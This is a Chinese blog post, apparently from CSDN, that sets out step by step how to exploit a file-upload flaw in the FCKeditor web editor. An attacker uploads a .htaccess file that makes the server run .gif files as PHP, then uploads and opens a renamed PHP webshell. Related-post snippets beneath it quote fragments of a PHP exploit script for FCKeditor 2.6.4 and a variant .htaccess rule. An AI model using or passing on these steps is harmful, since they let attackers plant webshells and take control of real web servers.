FCKeditor编辑器全部版本另类上传漏洞

最新推荐文章于 2024-05-14 03:24:06 发布
最新推荐文章于 2024-05-14 03:24:06 发布
阅读量708 收藏
点赞数
分类专栏: 漏洞收集 文章标签: fckeditor shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/god_7z1/article/details/6732369
版权

利用步骤:
1.创建一个htaccess文件:
代码内容:

SetHandler application/x-httpd-php

2.实用编辑器上传htaccess文件.

http://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html

http://www.webshell.cc/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://www.badguest.cn/上传目录/shell_php.gif

复现awvs——FCKeditor 任意文件上传漏洞思维引导到getshell
记录并分享学习安全的知识点..
03-20 6669
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、复习文件解析漏洞 解析漏洞,是指中间件(Apache、nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件的解析。 (一)Apache解析漏洞 Apache解析文件规则是从右到左。例如shel.php.gix.ccc,apache会先识别ccc,ccc不被识别,则识别gix,以此类推,最后会被识别为php来运行。 文件解析漏洞总结-Apache_1stPeak的博客-优快云...
fckeditor <= 2.6.4 任意文件上传漏洞
blogfeifei
09-27 273
&lt;? error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 8...
Fckeditor 漏洞最新整理.
09-05
Fckeditor 漏洞最新整理. 网络 安全 web出防攻
FCKeditor编辑器版本上传漏洞
weixin_30800807的博客
08-26 326
漏洞利用方法: 1.创建一个htaccess文件: 加入以下代码: <FilesMatch “_php.gif”> SetHandler application/x-httpd-php </FilesMatch> 2.使用编辑器上传htaccess文件. 3.上传shell.php.gif 4.上传shell.php.gif, 会自动被改名为 shell_php.gif ...
FCKeditor 2.6.4 php版本任意文件上传——漏洞复现
W小哥
06-17 8791
一、漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多Web项目和大型网站均采用了FCKeditorFckeditor 低于 2.6.4 php 版本任意文件上传漏洞,当您的PHP环境配置为 GPC = Off 时可绕过currentfolder参数过滤上传脚本木马控制网站服务器 二、漏洞原理 漏洞版本:<=2.6.4 三、环境搭建
Fckeditor漏洞
zhangpeng999123的博客
03-07 2650
首先是对目标站点进行了基本的测试然后发现了存在fckeditorfckeditor漏洞有很多,基本asp的都被通杀了,大家可以在网上看看。首先看看编辑器版本: $ http://xxxxxxx.com/fckeditor/editor/dialog/fck_about.html 查看版本信息: 版本信息 可以看到是2.6.6版本,那就对症下药。同时提一下,查看版...
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
Exploiting PHP Upload Module ofBypassing File-type CheckExploiting PHP Upload Mo
fckeditor编辑器上传——含有点变成下划线限制的源码包
12-08
fckeditor编辑器上传——含有点变成下划线限制的源码包】 Fckeditor是一款流行的开源富文本编辑器,它允许用户在网页上创建和编辑内容,类似于Microsoft Word的功能,但用于网页环境。这个源码包是针对一个特定的...
FCKeditor编辑器添加图片上传功能及图片路径问题解决方法
10-26
在本文中,我们将探讨如何为ASPCMS系统中的FCKeditor编辑器添加图片上传功能以及解决图片路径问题。FCKeditor是一款广泛使用的富文本编辑器,但由于安全考虑,许多CMS系统可能会禁用其内置的上传功能。不过,通过...
2024年【渗透测试】--- FCKeditor文本编辑器漏洞_ckeditor漏洞,保洁阿姨看完都会了
最新发布
2401_85013604的博客
05-14 2394
迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
最新FCKeditor_2.6 版本 FCKeditor编辑器和控件
07-26
实际上,需要对FCKeditor编辑器文件组中的通用配置文件/fckconfig.js和ASP.NET专用文件上传管理代码文件/editor/filemanager/connectors/aspx/config.ascx进行配置。 1. 配置控件语言 FCKeditor是自动探测浏览器...
fckeditor 上传漏洞解决
04-12
解决fckeditor 上传漏洞,类似asp;.jpg asp.jpg
FCKeditor2.6.4.1 在线编辑器 JSP
08-29
FCKeditor2.6.4.1 在线编辑器 JSP 还有JSP上传文件组件
FCKeditor 2.6.6 可直接使用
07-19
比起ckeditor编辑器,还是觉得这个好用,可直接复制到自己的项目上去使用,使用文档里有使用指南!
fckeditor 2.6 php,fckeditor 2.6.4 任意文件上传漏洞
weixin_32691939的博客
03-10 537
描述:fckeditor详细说明:currentfolder过滤不给力啊,但是GPC就能让它脑残!下面是利用工具!利用:error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function...
FCKeditor所有版本任意文件上传缺陷
weixin_30416871的博客
09-04 208
In The Name Of GOD[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability[+] Date: 2011[+] script:http://sourceforge.net/projects/fckeditor/[+] Author: pentesters.ir[+] Website : WwW.Pen...
fckeditor漏洞_三十,文件上传漏洞编辑器漏洞和IIS高版本漏洞及防御
qq_50854662的博客
11-08 5170
fckeditor漏洞_三十,文件上传漏洞编辑器漏洞和IIS高版本漏洞及防御
fckeditor 2 6 4 任意文件上传漏洞
ytfhjhv的博客
11-12 6523
fckeditor 2 6 4 任意文件上传漏洞
FCKeditor编辑器hwp363版本功能解析
标题中提到的"FCKeditor编辑器",是早期一款流行的网页内容编辑器,后来改名为CKEditor,但在本段描述中反复提及的“hwp363”似乎并非此编辑器的标准术语或版本号,可能是描述中的一个重复词汇错误,因此在后续的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值